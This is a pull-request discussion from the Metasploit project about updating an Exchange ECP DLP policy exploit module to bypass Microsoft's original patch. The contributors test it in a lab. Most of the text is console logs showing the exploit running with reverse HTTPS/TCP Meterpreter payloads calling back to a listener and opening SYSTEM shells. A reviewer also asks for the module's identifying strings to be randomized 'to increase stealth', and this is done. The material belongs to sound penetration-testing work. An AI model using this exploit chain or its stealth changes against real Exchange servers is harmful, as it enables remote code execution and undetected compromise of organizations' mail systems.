Updates for Exchange ECP DLP Policy Exploit

[zeroSteiner]

This updates the exchange_ecp_dlp_policy module to leverage the technique disclosed today which bypasses the original patch. I updated the exploit logic to use the new technique after verifying the original did not work against Exchange Server 2016 CU19. After updating the exploit, I reverted back to my older version of Exchange and validated that it still worked, which it does so we can safely use the bypass technique as a one-size-fits all. The older version I tested was Exchange Server 2016 CU12. I also added a paragraph to the docs describing the relationships between the patches, updates and CVEs.

The exploit and check method both work. The exploit does need to be authenticated and the user needs to have an admin privilege. I just used a domain admin account in my lab which was the easiest way to get the necessary privileges.

Tested on Exchange Server 2016 with CU19 released December 2020 (latest cumulative update).

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > show options 

Module options (exploit/windows/http/exchange_ecp_dlp_policy):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1        no        OWA password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.42   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   USERNAME   alice            no        OWA username
   VHOST      WIN-BPID95ACQ7E  no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Exchange Server <= 2016 CU19 and 2019 CU8


msf6 exploit(windows/http/exchange_ecp_dlp_policy) > exploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] https://192.168.159.128:8443 handling request from 192.168.159.42; (UUID: zeitmqvn) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.42:9211) at 2021-01-12 17:59:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 7
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.42 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/http/exchange_ecp_dlp_policy) >

Updates #14126.

[cdelafuente-r7]

Thanks for updating this module @zeroSteiner!

I successfully tested against Exchange Server version 15.1.2176 on Windows server 2016. I have a few comments:

1. I had to increase the HttpClientTimeout since the query to ManagePolicyFromISV.aspx can take a long time to respond, which break the exploit. It does not happen all the time, so I think it was more related to my environment than a real issue.

2. I also got this error:

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds <redacted>
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Windows__Http__Exchange_ecp_dlp_policy::MetasploitModule::Faker

Adding require 'faker' in the module fixes it.

3. I noticed some information sent in the DLP policy XML contains data that, in my opinion, should be changed to increase stealth:

  def dlp_policy_template
          ...
          <publisherName>Metasploit</publisherName>
          ...
          <description>
            <localizedString lang="en">wvu was here</localizedString>
          </description>
          ...

This information appears on the server this way:

[zeroSteiner]

In commit 1f5f086, I required faker as you suggested and utilized it more to generate a random publisher and description. Faker::Hacker.say_something_smart seemed like a good fit for the description 😄 .

[jmartin-tech]

@msjenkins-r7 test this please.

[cdelafuente-r7]

Thanks for updating the code @zeroSteiner ! Everything is good now. I'll go ahead and land it.

Here is the output against Exchange version 15.1.2176 on Windows server 2016 :

msf6 exploit(windows/http/exchange_ecp_dlp_policy) > options

Module options (exploit/windows/http/exchange_ecp_dlp_policy):

   Name       Current Setting      Required  Description
   ----       ---------------      --------  -----------
   PASSWORD   <redacted>           no        OWA password
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     <redacted>           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443                  yes       The target port (TCP)
   SSL        true                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                    yes       Base path
   USERNAME   <redacted>           no        OWA username
   VHOST      <redacted>           no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <redacted>       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Exchange Server <= 2016 CU19 and 2019 CU8


msf6 exploit(windows/http/exchange_ecp_dlp_policy) > check
[*] <redacted>:443 - The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run

[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds <redacted>
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Ruecker-Shields Data
[*] Powershell command length: 2096
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> <redacted>:56146) at 2021-02-11 15:08:42 +0100
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 12
Meterpreter     : x64/windows

[cdelafuente-r7]

Release Notes

Updated the Exchange ECP DLP Policy module exploit to leverage a new technique which bypasses the original patch. This new technique also works on unpatched versions.

[wvu]

Nice job! Thank you, all.